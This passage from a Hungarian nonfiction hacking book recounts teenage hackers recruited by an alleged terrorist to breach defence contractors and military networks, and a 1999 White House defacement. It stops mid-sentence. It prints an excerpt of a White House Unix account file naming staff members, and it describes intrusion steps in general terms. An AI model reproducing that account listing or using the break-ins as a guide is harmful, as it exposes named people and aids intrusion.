Időközben csak nem jött a pénz a kínai egyetem hackeléséért.
Amikor ne0h rákérdezett, Khalid mérges lett. – Nem kaptad meg? Egy
születésnapi üdvözlőkártyában küldtem el – mondta. Természetesen ez
a jó öreg „a csekk a postádban van” trükk volt, ennek ellenére ne0h
továbbra is hajlandó volt megbízásokat elfogadni. Miért? Ahogy ma
magába néz:
Azért folytattam, mert makacs vagyok. Izgalmas volt azt hinni, hogy
fizetni fognak érte. És azt gondoltam, hátha tényleg elveszett a postán,
talán ez alkalommal majd fizetni fog.
Nem tudom, miért nem tudtam abbahagyni. A megrögzött
természetem? Pénzéhség? Hatalomvágy? Számtalan lehetséges okot
meg tudok nevezni.
Miközben Khalid megbízásokkal tömte ne0h-t, további
együttműködésre hajlandó játékosok után kutatott az IRC oldalakon.
Elvtárs hajlandónak mutatkozott, noha bizalmatlan volt a fizetés
elfogadásával kapcsolatban:
Megértettem, hogy fizet az embereknek, én azonban nem akartam
információt kiadni magamról azért, hogy pénzt kapjak. Úgy gondoltam,
hogy amit csinálok, az nem más, mint hogy kicsit körbenézek, ám ha
elkezdenék pénzt elfogadni érte, akkor igazi bűnözővé válnék.
Legfeljebb beszélek vele az IRC-n, és alkalmanként dobok neki néhány
hostot.
A riporter Niall McKay beszélt egy Khalid által becserkészett
vaddal: egy kaliforniai tizenéves srác, aki Chameleon néven volt ismert
(és aki most egy sikeres biztonságtechnikai szoftvercég társalapítója).
A Wired.com[1] oldalon megjelentetett McKay-sztori egybevág a ne0h
és az Elvtárs által megadott részletekkel. – Egyik este az IRC-n voltam,
amikor ez a fickó azt mondta, hogy a DEM szoftvert akarja
megszerezni. Nekem nem volt meg, és csak az időt fecséreltem ezzel a
fickóval – állította a hacker. Ekkorra Khalid bekeményített: a „DEM” a
Defense Information Systems Network Equipment Manager (Védelmi
információrendszerek hálózati berendezéskezelő) beceneve, ez pedig
nem más, mint a katonaság által használt hálózati szoftver. A
programot egy Masters of Downloading nevű hackercsoport szerezte
meg, és úgy hírlett, hogyha valaki a megfelelő személyhez fordul,
megszerezheti a programot. Senki sem tudja, hogy Khalidnak valaha
sikerült-e rátennie a kezét a programra – legalábbis senki nem ismeri
ezt be. Tulajdonképpen még az sem biztos, hogy számára bármilyen
értéket jelentett-e egyáltalán a szoftver – ő nyilván azt gondolta, hogy
igen. Khalid túl volt már azon, hogy kínai egyetemekkel és hasonlókkal
játszadozzon.
– Megpróbálta integrálni magát abba, amit a csoportban levő srácok
csináltak – mondta nekünk ne0h. Mielőtt vége lett volna, Khalid egy és
fél évig tartotta a kapcsolatot a hackerekkel, „nem úgy, mint egy hébe-
hóba felbukkanó valaki, hanem rendszeresen. Ott volt, és mindenki
értette, hogy ez az „ő dolga.” Az „ő dolgán” ne0h katonai oldalakra,
illetve hadászati projekteken dolgozó kereskedelmi cégek számítógépes
rendszereibe való betörést értette.
Khalid megkérte ne0h-t, hogy jusson be a Lockheed Martinhoz, és
szerezze meg a Boeingnek gyártott bizonyos repülőgéprendszerek
vázlatrajzát. ne0h-nak sikerült korlátozott hozzáférést szerezni a
Lockheedhoz, „körülbelül háromszintnyit a belső hálózatba”, azonban
két szervernél nem tudott beljebb jutni (ezt a szintet nevezik a
biztonsági szakemberek „DMZ”-nek – tulajdonképpen ez a senki
földje). Ez messze nem volt elég ahhoz, hogy túlhatolhasson a
legtitkosabb céges információkat védő tűzfalakon, és arra sem volt
képes, hogy meghatározza a keresett információ helyét. ne0h így
emlékezik erre:
Khalid ideges lett. Tulajdonképpen azt mondta, hogy „többé nem
dolgozol nekem. Semmit nem tudsz megcsinálni.” Majd azzal vádolt
meg, hogy visszatartok valamit. Azt mondta, hogy az információt
megtartom magamnak.
Ezt követően azt mondta: – Felejtsd el a Lockheed Martint. Menjél
közvetlenül a Boeinghez.
ne0h azt találta, hogy a Boeing „nem volt annyira biztonságos, ha
eléggé akartad a dolgokat”. Elmondta, hogy úgy jutott be, hogy a
Boeing rendszer egy ismert, az interneten elérhető sebezhetőségét
használta ki. Majd egy „sniffer” (szaglászó) programot telepítve képes
volt a gépről kimenő és arra érkező adatcsomagok lehallgatására.
Innentől kezdve meg tudta szerezni a jelszavakat és a nem titkosított e-
maileket. Az e-mailekből szerzett információk elég tudást jelentettek
ahhoz, hogy bejusson a belső hálózatba.
Hat vagy hét vázlatrajzot találtam a Boeing 747-es ajtaihoz és
orrához – egyszerű szöveges e-mailben küldve. Nem titkosított
mellékletek. Hát nem nagyszerű?! (És felnevet.)
Khalid eksztázisba jött. Azt mondta, 4000 dollárt fog adni nekem.
Soha nem érkezett meg – micsoda meglepetés!
A 4000 dollár valójában több mint nagyvonalú lett volna ezért az
információért. A Boeing korábbi biztonságért felelős vezetője, Don
Boelling elmondta, hogy ez a hackelés valóban megtörténhetett a fent
leírt módon. Azonban ez csak időpazarlás lett volna: amikor egy
repülőgépmodellt forgalomba helyeznek, minden, az adott gépet
üzemeltető légitársaság megkapja a teljes tervrajzot. Ettől a ponttól
kezdve azonban az információt nem tekintik titkosnak; bárki
megszerezheti azt. – Még olyat is láttam, hogy a 747-es egy CD-re
felírt tervrajzait nemrégiben az eBay-en árulták – mondta Don.
Természetesen Khalid valószínűleg nem tudta ezt. És további két évbe
telt, amíg az amerikai nemzet rájött, hogy milyen nyomós oka lehet
annak, hogy a terroristák meg akarják szerezni az amerikai
légitársaságok által leggyakrabban használt gépek tervrajzait.

A ma esti cél: SIPRNET

Az Elvtárs esetében Khalid nem bajlódott azzal, hogy


próbafeladatokat adjon neki. Ahogy a hacker elmondta, Khalidot az
első pillanattól kezdve csak „a katonaság és a SIPRNET érdekelte”.
Legtöbbször nem mondta meg pontosan, hogy mit akart – csupán
hozzáférést a kormányzati és katonai oldalakhoz. Kivéve a SIPRNET-
et. A SIPRNET-ről információkat akart kapni.
Nem csoda, hogy Khalid kíváncsi volt; valószínűleg mindvégig ez
volt a célpontja. A SIPRNET a DISN, a Defense Information System
Network (Védelmi informatikai hálózat) része, amely bizalmas
üzeneteket közvetít. Azonban a SIPRNET (a Secret Internet Protocol
Router Network kifejezésből eredő betűszó) ennél több: jelenleg ez az
amerikai katonaság irányító és ellenőrző funkcióinak a lelke.
ne0h egyszer már visszautasította Khalid egy a SIPRNET-hozzáférés
megszerzésére vonatkozó megbízását:
Kétezer dollárt ajánlott. Elutasítottam. Ha bejutnék a SIPRNET-be,
a szövetségi nyomozók már kopognának is az ajtómon. Kétezer dollár
nem ér meg egy golyót a fejembe.
Mire Khalid beszélt Elvtárssal a megbízásról, az ár felment. – Azt
hiszem, azt mondta, hogy tízezer dollárt fizet a hozzáférésért –
emlékszik vissza Elvtárs, és sokkal kevésbé tűnik izgatottnak, mint
ne0h, amikor a projektről beszélt, noha Elvtárs is meggyőzően
ragaszkodik ahhoz, hogy a kihívás, nem pedig a pénz vonzotta.
Valójában marha közel kerültem a SIPRNET-hez. Bejutottam a
Defense Information Security Agency (Védelmi információbiztonsági
ügynökség), a DISA egy gépes rendszerébe. Az a gép egyszerűen
„dörzsölt” volt. Azt hiszem, négy processzora volt, mintegy 2000
felhasználónak volt hozzáférése, a Unix host fájlban mintegy 5000
különbözőhost volt, ezek fele privilegizált felhasználói nevet használt; a
hozzáféréshez azon a számítógépen kellett hogy legyen – kívülről nem
lehetett hozzáférést szerezni.
Elvtárs azon gyanúja, hogy valami nagyon fontosba mászott bele,
helyesnek bizonyuk. A DISA alapfeladatai közé közös vezérlés és
ellenőrzés, illetve harckiszolgáló számítások tartoztak – teljes átfedés a
SIPRNET funkcióival. Próbálkozásai azonban rövidre lettek zárva.
Nagyon szuper lett volna mindehhez hozzáférni, de sohasem volt elég
időm, hogy addig eljátszogassak, hogy eljussak valahova. Kudarcot
vallottam úgy három-négy nappal később.

Az aggódás ideje
1999 karácsonyán ne0h és Elvtárs igen meglepődtek. Az indiai
légitársaság IC-8l4-es járatát, útban Katmanduból Új-Delhibe,
fedélzetén 178 utassal és 11 főnyi személyzettel, eltérítették. A
híradások szerint a gép eltérítői pakisztáni terroristák voltak, akik
kapcsolatban álltak a Talibánnal. Lehet, hogy olyan terroristák voltak,
mint Khalid?
A gépeltérítők parancsait követve az Airbus A300 cikkcakkos utat
tett meg Közel-Keletre és vissza, rövid időre leszállva Indiában,
Pakisztánban és az Egyesült Arab Emírségekbe, ahol kirakták egy
meggyilkolt utas holttestét; egy fiatal férfiét, aki ifjú nejével éppen
nászútjukról tartott hazafelé. Azért szúrták le, mert nem volt hajlandó
feltenni a szemkötőt.
A gép végül az afganisztáni Kandaharban szállt le – növelve ezzel a
tálib kapcsolat valószínűségét. A többi utast és a személyzetet nyolc,
terrorral sújtott napig a fedélzeten tartották, és végül három
bebörtönzött milicista szabadulásáért cserébe engedték el őket. A
szabadon engedett milicisták egyike, Sheikh Umer később szerepet
játszott Mohammed Atta, a szeptember 11-i Világkereskedelmi
Központ elleni támadások egyik vezetőjének anyagi támogatásában.
A gépeltérítés után Khalid elmondta ne0h-nak, hogy a csoportja volt
a felelős a bűntényért, és ő maga személyesen benne volt a dologban.
Ez halálra rémített. Rossz fickó volt. Úgy éreztem, hogy védenem kell
a seggemet.
De ne0h aggodalmát elnyomta a gyerekes kapzsisága. – Még mindig
reméltem, hogy kifizeti a pénzemet – tette hozzá.
A géprablási kapcsolat olaj volt a Khalid által korábban lángra
lobbantott tűzre. Egyszer, nyilvánvalóan felbosszantva attól, hogy a
tinédzserek nem tudták az általa kért információkat megszerezni,
Khalid megpróbálta nyomás alá helyezni a fiúkat. Niall McKay a
riporter, a Wired.com oldalon megjelentetett, már említett történetben
beszámolt Khalid egy régi, a fiúknak szóló IRC üzenetéről, amelyben
megfenyegette őket, hogy megöli, ha feljelentik az FBI-nak. McKay a
pakisztáni egy másik üzenetéről is írt: „Tudni akarom; mondott bárki
valamit rólam a szövetségieknek?” És egy másik helyen; „Mondd meg
nekik, hogy ha megtették, halottak. Orvlövészeket fogok rájuk
állítani.”[2]

Elvtárst letartóztatják
A helyzet már így is kezdett nagyon meleg lenni, azonban még ennél
is rosszabbra fordult. Néhány nappal azután, hogy Elvtársnak sikerült
bejutnia a SlPRNET-hez kapcsolódó rendszerhez, apját, miközben
dolgozni ment, félreállították a rendőrök. Azt mondták neki: – A fiával
akarunk beszélni – és egy házkutatási parancsot mutattak neki. Elvtárs
így emlékszik erre:
Volt néhány ember a NASA-tól, a DoD-től (Department of Defense,
az USA védelmi minisztériuma) és az FBI-tól. Összesen olyan tíz vagy
tizenkét ügynök volt és néhány zsaru is. Korábban NASA
postaládákban babrálgattam, és snifferprogramot raktam a
ns5.gtra.mil szerverre, hogy jelszavakat szedjek össze. Mellékhatásként
azonban e-maileket is összeszedtem. Azt mondták, hogy ezért illegális
lehallgatással vádolnak. A NASA számítógépein ráadásul szerzői
jogokat sértettem. És más egyebet is.
Pont az előzőnap egy barátom azt mondta: – Haver, hamarosan
letartóztatnak minket. – Beparázott. Úgy gondoltam: – Igen, igaza
lehet. – Így letöröltem a merevlemezemet.
Azonban Elvtárs nem fejezte be a takarítást. – Elfelejtettem az
asztalom mellett elfekvő régi meghajtókat.
Kifaggattak. Bevallottam, azt mondtam: – Sajnálom, itt van, amit
tettem, így lehet kijavítani, nem fogom többet megtenni. – Erre így
reagáltak: – Rendben, nem tekintünk bűnözőnek, de ne csináld ezt még
egyszer Ha megteszed, bilincsben fogunk elvinni. – Összeszedték a
számítógépeimet, a perifériákat és merevlemezeket, majd elmentek.
Később megpróbálták rávenni Elvtárst, hogy mondja meg nekik a
titkosított merevlemezeinek a jelszavát. Amikor nemet mondott, azt
mondták, hogy tudják, hogyan törjék fel a jelszavakat. Elvtárs azonban
jobban tudta: PGP (Pretty Good Privacy – egész jó titkosítás) titkosítást
használt, és a jelszava körülbelül száz karakter hosszú volt”. Ennek
ellenére nem volt nehéz megjegyezni – három kedvenc idézete egymás
után.
Elvtárs körülbelül hat hónapig semmit nem hallott felőlük. Majd egy
nap megtudta, hogy a kormányzat feljelentette. Mire bíróság elé került,
az államügyész azzal vádolta, hogy háromhetes üzemzavart okozott a
NASA számítógépeiben, és több ezer e-mailt hallgatott le a Védelmi
Minisztériumban.
(Saját magam is jól tudom, hogy az ügyészek által előadott és a
valódi károk között néha szakadéknyi különbség tátong. Elvtárs
letöltött a NASA Alabamá-ban levő Marshall Space Flight Centerből
[Marshall űrrepülési központ] egy szoftvert, amit a nemzetközi
űrállomás hőmérsékletének és páratartalmának szabályozására
használtak; a kormányzat azt állította, hogy ez háromhetes üzemzavart
okozott a számítógépes rendszerekben. A Védelmi Minisztérium elleni
támadás miatti aggodalom valóságosabb volt: Elvtárs a Defense Threat
Reduction Agency [Védelmi fenyegetést csökkentő ügynökség]
számítógépes rendszerébe tört be, és egy állandó hozzáférést biztosító
„hátsó ajtót” telepített.)
A kormányzat nyilvánvalóan a többi tizenéves hackernek szóló
figyelmeztetésként kezelte az ügyet, és a bizonyítás jelentős része
napvilágot látott a sajtóban, úgy állítva be őt, mint a legfiatalabb
személy, akit valaha is elítéltek szövetségi bűnként elkövetett
hackelésért. Janet Reno igazságügyminiszter még egy közleményt is
kiadott, amely egyebek között a következőket tartalmazta: „Ez az ügy,
amely után először fog előfordulni, hogy egy fiatalkorú
javítóintézetben letölti a büntetését, mutatja, hogy komolyan vesszük a
számítógépes behatolásokat, és azon dolgozunk a rendészeti
szervekkel, hogy határozottan felvegyük a harcot e problémával.”
A bíró hat hónap börtönre, majd azt követő hat hónap próbaidőre
ítélte Elvtárst, amit az iskolai tanév végén kellett megkezdenie. Elvtárs
édesanyja akkor még élt; egy új ügyvédet fogadott, írt egy rakás
levelet, Elvtárs megítélése szerint „egy teljesen más ügyet” vitt a bíró
elé, és – meglepő módon – sikerült elintéznie, hogy a büntetést házi
őrizetre, majd azt követő négy év próbaidőre csökkentsék.
Előfordul az életben olyan, hogy nem hozzuk ki a legtöbbet a
lehetőségeinkből. – Letöltöttem a házi őrizetet, és éppen a próbaidőmet
töltöttem. Különböző dolgok történtek, elkezdtem túl sokat bulizni,
ezért rehabilitációra küldtek. – A rehabilitációról visszatérve Elvtárs
állást kapott egy internetes cégnél, és saját internetes üzletbe kezdett.
De ő és a próbaidőt felügyelő tiszt nem egészen voltak egy
véleményen, és végül Elvtárst börtönbe küldték. Mindössze 16 éves
volt, és olyan bűnökért börtönözték be, amiket 15 éves korában
követett el.
Nem túl sok szövetségi börtön van fiatalkorúak számára; kiderült,
hogy a hely, ahova küldték, egy „tábor” (találó elnevezés) Alabamában,
ahol mindössze 10 rabot tartottak fogva. Elvtárs így írja le ezt a helyet:
– Inkább tűnt iskolának – zárt ajtók és drótkerítés, azonban ezen kívül
nem nagyon hasonlított egy börtönhöz. – Ráadásul még iskolába sem
kellett járnia, mert már befejezte a középiskolát.
Amikor visszakerült Miamiba, és ismét próbaidőn volt, kapott egy
listát olyan hackerekről, akikkel nem volt szabad beszélnie. – A lista
úgy nézett ki, hogy ez a srác, az a srác és ne0h. – Csupán ne0h – a
szövetségi kormány csak ezt a nevét ismerte. – Fogalmuk sem volt, ki
ő. Ha én kétszáz dologhoz fértem hozzá, akkor ő ezerhez – mondja
Elvtárs – ne0h nagyon dörzsölt volt. – Amennyire tudja, a
nyomozóknak még mindig nem sikerült kideríteniük a nevét vagy a
tartózkodási helyét.

Nyomozás Khalid után

Vajon Khalid valóban milicista volt, ahogy beállította magát, vagy


csaló, aki csak átvágta a tinédzsereket? Vagy ez talán egy FBI művelet
volt annak kipróbálására, hogy milyen messzire hajlandók elmenni a
fiatal hackerek?
Alkalmanként minden hacker, aki kapcsolatban állt Khaliddal, azt
gyanította, hogy a férfi valójában nem is milicista; a gondolat, hogy
egy külföldi ügynöknek adnak információkat, sokkal kevésbé zavarta
őket, mint az, hogy a fickó esetleg becsapja őket. Elvtárs azt állítja,
hogy ő volt az, aki „a legtovább gondolkodott” azon, hogy ki volt
Khalid. Nem tudom, hogy szövetségi ügynök volt vagy az, akinek
mondta magát. Amikor ne0h-val és vele beszéltem, úgy éreztem, hogy
igazat mond. De soha nem kaptam pénzt tőle – ez olyan korlát volt,
amit nem tudtam átlépni. – (Amikor a beszélgetés korábbi részében
először említette Khalid 10000 dolláros ajánlatát, úgy tűnt, az összeg
lenyűgözte őt. Vajon valóban visszautasította volna a pénzt, ha
próbálkozásai sikerrel jártak volna és Khalid tényleg fizetett volna?
Talán még maga Elvtárs sem tudja a választ erre a kérdésre.)
ne0h azt állítja, hogy Khalid „teljesen profinak tűnt”, de bevallja,
hogy végig kétségei voltak a tekintetben, hogy valóban milicista-e. –
Akárhányszor beszéltünk, úgy éreztem, hogy egy rakás
szerencsétlenség. De miután utánanéztem a barátaimmal, akiket szintén
megkeresett és akiknek információkat adott, végül azt gondoltuk, hogy
tényleg az, akinek mondta magát.
Egy másik hacker, Savec0re találkozott az IRC-n valakivel, aki azt
mondta, hogy van egy nagybátyja az FBI-nál, aki védettséget szerezhet
a teljes Milw0rm nevű hackercsoportnak. – Arra gondoltam, hogy majd
ő küld egy üzenetet az FBI-nak, hogy nem vagyunk ellenségesek –
mondta Savec0re egy McKaynek adott e-mail-interjúban. – Így hát
megadtam a telefonszámomat. Másnap felhívott az úgy nevezett FBI
ügynök, de hihetetlenül erős pakisztáni akcentusa volt.
– Azt mondta, hogy Michael Gordonnak hívják, és Washington DC-
ben dolgozik az FBI-nak – mondta Savec0re az újságírónak. –
Rájöttem, hogy végig Ibrahim volt az. – Míg egyesek azon
morfondíroztak, hogy a feltételezett terrorista valójában FBI ügynök
lehet, Savec0re az ellenkező megállapításra jutott: a magát FBI
ügynöknek kiadó fickó valójában ugyanaz a terrorista volt, és azt
próbálta ellenőrizni, hogy a fiúk hajlandók-e beköpni őt.
A feltételezés, hogy ez egy FBI művelet lett volna, nem állta meg a
helyét. Ha a szövetségi kormány ki akarta volna deríteni, hogy a srácok
mit tudnak és mit hajlandók megtenni, jött volna pénz is. Ha az FBI
olyan komolynak érez egy helyzetet, hogy titkos akciót folytasson,
akkor pénzt is raknak bele. Annak semmi értelme nem lett volna, hogy
ígérnek ne0h-nak 1000 dollárt, majd nem fizetik ki.
Úgy tűnik, hogy egyetlen hacker látott pénzt Khalidtól: Chameleon.
– Egyik reggel a postaládámhoz mentem, és egy ezerdolláros csekket
találtam benne, rajta egy bostoni telefonszámmal. – Chameleon egy
másik Wired News sztoriban számolt be erről (1998. november 4.).
Khalid tudta, hogy a fiúnak vannak térképei a kormányzati
számítógéphálózatokról; a csekket a térképekért kapta. Chameleon
beváltotta a csekket. Két héttel később rajtaütött az FBI, és kihallgatták
a kifizetésről, ami azt az érdekes kérdést vetette fel, hogy a kormányzat
honnan tudott az ezer dollárról. Ez szeptember 11. előtt volt, amikor az
FBI a helyi bűncselekményekre összpontosított, és alig fordított
figyelmet a terrorista fenyegetésre. Chameleon elismerte, hogy felvette
a pénzt, de ragaszkodott a Wired News újságíróhoz, és ahhoz, hogy
semmilyen kormányzati hálózati térképet nem adott át.
Noha bevallotta, hogy pénzt fogadott el külföldi terroristától, ami a
kémkedés vádját és egy nagyon komoly büntetés lehetőségét hozhatta
volna rá, soha nem került vád alá – ez még titokzatosabbá teszi az
esetet. Talán a kormányzat csak szerette volna elhinteni a
hackerközösségben, hogy veszélyes a külföldi ügynökökkel üzletelni.
Lehet, hogy a csekk végül is nem Khalidtól, hanem az FBI-tól jött.
Kevesen ismerik Chameleon igazi személyét, és ő nagyon szeretné,
ha ez így is maradna. Szerettük volna megtudni az ő történetét is.
Visszautasította, hogy beszéljen a dologról (mindössze annyit említett,
hogy azt gondolta, hogy Khalid egy magát terroristának beállító
szövetségi ügynök volt). Az ő helyében valószínűleg én sem szívesen
nyilatkoznék a témában.

A Harkat ul-Mujahideen

Miközben az Internet Relay Chat naplókat nézte át, McKay riporter


talált egy üzenetet, amelyben Khalid úgy mutatta be magát a fiatal
hackereknek, mint a Harkat-ul-Ansar tagja[3]. A South Asia
Intelligence Review (Dél-Ázsia Hírszerzési Szemle) szerint „a Harkat-
ul-Ansan az 1997-ben száműzött szaudi terroristával, Osama bin
Ladennel fennálló kapcsolata miatt tekinti az USA terrorszervezetnek.
Az amerikai megkülönböztetés káros következményeinek elkerülése
érdekében a csoport 1998-ban átalakult Harkat ul-Mujabideenné.”[4]
Az amerikai külügyminisztérium folyamatosan felhívta a figyelmet a
csoportra. Az egyik közleményben az olvasható, hogy „pakisztáni
hivatalos szervek elmondták, hogy a [2001.] október 23-ai amerikai
légitámadás 22 pakisztáni gerillát ölt meg, akik a Talibánnal harcoltak
Kabul közelében. A halottak a Harkat ul-Mujahiddeen tagjai voltak...
[amit] a Külügyminisztérium 1995-ben rakott fel a terrorszervezeteket
tartalmazó hivatalos listára.”[5]
Valójában a Harkat napjainkban egyike annak a 36 csoportnak, amit
az USA külföldi terrorszervezetnek tekint. Az amerikai kormány, más
szavakkal kifejezve, világunk legrosszabb szereplői közé sorolja őket.
A fiatal hackerek ezt persze nem tudták. Számukra mindez csak
játék volt.
Ami Khalidot illeti, az indiai hadsereg egy magas rangú tisztje 2002
áprilisában előadást tartott az információbiztonságról, ő megerősítette,
hogy Khalid terrorista volt, és elmondta a közönségének mindazt, amit
„a pakisztáni székhelyű Harkat-ul-Ansarhoz tartozó Khalid Ibrahim”[6]
hackerekhez fűződő kapcsolatáról tudott. A tábornok kissé zavartnak
tűnt azonban, mivel Khalid maga nem Pakisztánban, hanem a tábornok
saját országában, az indiai Delhiben tartózkodott.

Szeptember 11. következményei

Egyes hackerek manipulálják és becsapják az embereket.


Számítógépes rendszereket megbolondítva úgy gondolják, hogy
jogosultságot szereznek, pedig valójában ellopják azt; social
engineeringet alkalmazva manipulálják az embereket céljuk elérése
érdekében. Mindez azt jelenti, hogy amikor egy hackerrel beszélsz,
figyelmesen hallgatod, hogy mit mond, és ahogyan mondja, az sugallja,
hogy vajon hihetsz-e neki. Néha egyáltalán nem vagy ebben biztos.
Szerzőtársammal egyáltalán nem voltunk bizonyosak afelől, amit
ne0h a szeptember 11-én történtekkel kapcsolatos reakcióiról mesélt.
Úgy gondoljuk, elegendő, ha csak közreadjuk az elhangzottakat:
Tudjátok mennyit sírtam aznap? Biztos voltam benne, hogy az
életemnek annyi.
Ezt egy furcsa, ideges nevetés kísérte – vajon mit jelentett? Nem
tudtuk megmondani.
Azt gondoltam, hogy nekem is részem van benne. Bejutottam a
Lockheed Martinba és a Boeingbe, információkat szereztem, amit
felhasználhattak. Szomorú idővolt nekem és Amerikának.
Azért sírtam, mert soha nem gondoltam arra, hogy feljelentem. Nem
használtam az ítélőképességemet. Ezért bérelt fel engem, hogy
megtegyem neki mindezt...
Ha csak egy kicsit is benne volt a kezem a Világkereskedelmi
Központnál történtekben... [A gondolat] végtelenül kétségbeejtővolt.
Három barátomat vesztettem el a Világkereskedelmi Központban;
sosem éreztem magam ilyen nyomorultul.
Sok hacker mindössze tizenéves vagy akár annál is fiatalabb. Vajon
túl fiatalok ahhoz, hogy felismerjék a potenciális veszélyét annak, hogy
kérésekre válaszoljanak, amelyek veszélyt jelenthetnek az országa?
Személy szerint én úgy gondolom, hogy szeptember 11. gyanakvóbbá
tette az amerikai hackereket – még a legfiatalabbakat is –,
valószínűtlen, hogy egy terrorista át tudja verni őket. Legalábbis
remélem, hogy igazam van.

Betörés a Fehér Házba

A számítógépes biztonság története bizonyos módon párhuzamba


állítható a titkosírás (kriptográfia) ősi történetével. A kódkészítők
évszázadokon át olyan rejtjelezésen dolgoztak, amit „feltörhetetlennek”
lehet tekinteni. Azonban még ma is, az informatika korában, amikor a
számítógépek könnyedén titkosítanak üzeneteket egy
visszafordíthatatlan kódoló (one-time pad) vagy egy több száz
karakterből álló kulcs segítségével, a legtöbb kód feltörhető. (Amerika
kódkészítő és kódtörő szervezete, a National Security Agency
(Nemzeti Biztonsági Tanács) a világ legnagyobb, leggyorsabb és
legerősebb számítógépeivel büszkélkedhet.)
A számítógép-biztonság állandó macska-egér játék, amelyben a
biztonsági szakemberek állnak az egyik, a behatolók pedig a másik
oldalon. A Windows operációs rendszer több tízmillió sornyi kódból
áll. Mindenki beláthatja, hogy egy ilyen nagyméretű szoftver
szükségszerűen sebezhetőségeket tartalmaz, amelyeket egy hozzáértő
hacker fel fog fedezni.
Mind e közben a cég alkalmazottjai, a hivatalnokok, sőt néha még a
biztonsági szakemberek is telepítenek egy új számítógépet vagy
alkalmazást, és elmulasztják megváltoztatni az alapértelmezett jelszót,
vagy egy elfogadhatóan biztonságosat alkotni – sebezhető állapotban
hagyva az eszközt. Ha olvassuk a hackerek támadásairól és betöréseiről
szóló híreket, tudnunk kell, hogy katonai és kormányzati oldalakat, sőt
még a Fehér Ház weboldalát is feltörték már. Némelyiket nem is
egyszer.
Bejutni egy oldalra és elcsúfítani azt, egy dolog – legtöbbször
rendkívül egyszerű, és legfeljebb bosszankodást okozhat. Sok ember
mégis ugyanazt a jelszót használja mindenhez; ha egy weboldalra való
betöréssel jelszavakat lehet megszerezni, a támadó olyan helyzetbe
kerülhet, hogy a hálózaton levő más rendszerekhez is hozzáférhet, és
sokkal nagyobb kárt okozhat. ne0h elmondta, hogy ő és a gLobaLheLL
hackercsoport két másik tagja pontosan ezt tette 1999-ben, ráadásul az
Egyesült Államok egyik legkényesebb oldalán: a Fehér Házén.
Azt hiszem, hogy a Fehér Ház éppen újratelepítette az operációs
rendszerét. Minden vissza volt állítva az alapértelmezett beállításra. És
ezen tíz-tizenöt perc alatt Zyklon és MostFearD bejutottak,
megszerezték a jelszófájlt (shadowed), feltörték, beléptek, és
megváltoztatták az oldalt.
Tulajdonképpen mindössze arról volt szó, hogy jó időben voltak jó
helyen. Puszta véletlen volt, mázli, hogy éppen online voltak, amikor az
oldalon dolgoztak.
A gLobaLheLL chatszobában vitattuk meg. Hajnali háromkor
telefonon ébresztettek, és mondták, hogy éppen ezt csináljuk. Azt
mondtam: – Baromság. Bizonyítsátok be. – A számítógépemhez
ugrottam.
És tényleg, megtették.
MostFearD és Zyklon csinálták a javát. Nekem adták a shadowed
fájlt, hogy amilyen gyorsan tudom, törjem fel. Egyet [jelszót] találtam
– egyszerű, bármely szótárban benne levőszót. Ennyi volt.
ne0h megmutatta egy részét annak a jelszófájlnak, amit a többiek
szereztek meg és adtak oda neki; a lista látszólag a Fehér Ház
személyzetének néhány jogosult felhasználóját tartalmazza[7]:
root:X:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:X:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Adinin: /var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:NetWork Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:6 5534:SunOS 4.x Nobody:/:
bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh
orion:x:1002:10:Christopher
Adams:/usr/users/orion:/usr/ace/sdshel1
webadm:x:1130:101:Web
Administrator:/usr/users/webadm:/bin/sh
cadams:x:1003:10:Christopher
Adams:/usr/users/cadams:/usr/ace/sdshell bartho_m:x:1004:101:Mark
Bartholomew:/usr/users/bartho_m:/usr/ace/sdhell
monty:x:113 9:101:Monty
Haymes:/usr/users/monty:/bin/sh
debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh
connie:x:1149:101:Connie
Colabatistto:/usr/users/connie:/bin/sh
bill:x:1005:101:William
Hadley:/usr/users/bi11:/bin/sh
Ez egy Unix vagy Linux jelszófájl formában van; ilyet használnak,
amikor a titkosított jelszavakat egy különálló, védett fájlban tárolják.
Minden sorban egy olyan személy nevét találjuk, akinek felhasználói
neve van a rendszerhez. A némely sorban található „sdshell” bejegyzés
arra utal, hogy a fokozott biztonság érdekében ezek a felhasználók egy
RSA SecureID nevű kis elektronikus készüléket hordanak magukkal,
amely egy 60 másodpercenként változó, hatjegyű számot jelenít meg.
A bejelentkezéshez ezek a felhasználók meg kell hogy adják az adott
pillanatban a SecureID készülékükön megjelenő hatjegyű számot és a
PIN kódjukat (amely lehet, hogy előre meg van határozva, illetve lehet,
hogy a felhasználó saját maga választja ki). A Fehér Ház honlapját a
betöréssel egy időben csúfították el, ne0h szerint jelez ve ezzel, hogy
ott jártak; ne0h adott egy linket a módosított nyitóoldalhoz (lásd 2-1.
ábra).
A gLobaLheLL hackercsoport jelképén túlmenően az üzenet a Hong
Kong Danger Duo lógóját is tartalmazta. Ez – ahogy ne0h elmondta, –
egy álnév volt, amelyet a megtévesztés kedvéért használtak.
neOh úgy emlékszik, hogy a Fehér Ház hackeléséért felelős srácok
nem éreztek különösebb ujjongást amiatt, hogy képesek voltak betörni
egy olyan oldalra, amely az ország fél tucatnyi vagy tucatnyi
legbiztonságosabb oldala közé kellene, hogy tartozzon. – Túlságosan el
voltak foglalva azzal, hogy megpróbáljanak mindenhova betörni –
magyarázta ne0h hogy bebizonyítsák a világnak, hogy ők a legjobbak.
Ahelyett, hogy virtuálisan vállon veregették volna egymást, inkább
olyan „szép munka fiúk, végre sikerült, mi a következő” hozzáállásuk
volt, mondja. Azonban a hasonló jellegű betörésekre sem nagyon
maradt idejük. A világuk hamarosan összeomlott, és a mese ezen része
a titokzatos Khalidhoz viszi vissza történetünket.
2-1. ábra: A Fehér Ház megváltoztatott weboldala, 1999. május
Zyklon, akit egyébként Eric Burns néven ismernek, ennél a pontnál
átveszi a szót. Elmondja, hogy tulajdonképpen soha nem volt tagja a
gLobaLheLL-nek, de némelyik fiúval együtt ő is az IRC-n lógott. Ő
úgy meséli az eseményeket, hogy a Fehér Ház hackelése akkor vált
lehetségessé, amikor rájött, hogy a weboldal feltörhető a PHF nevű
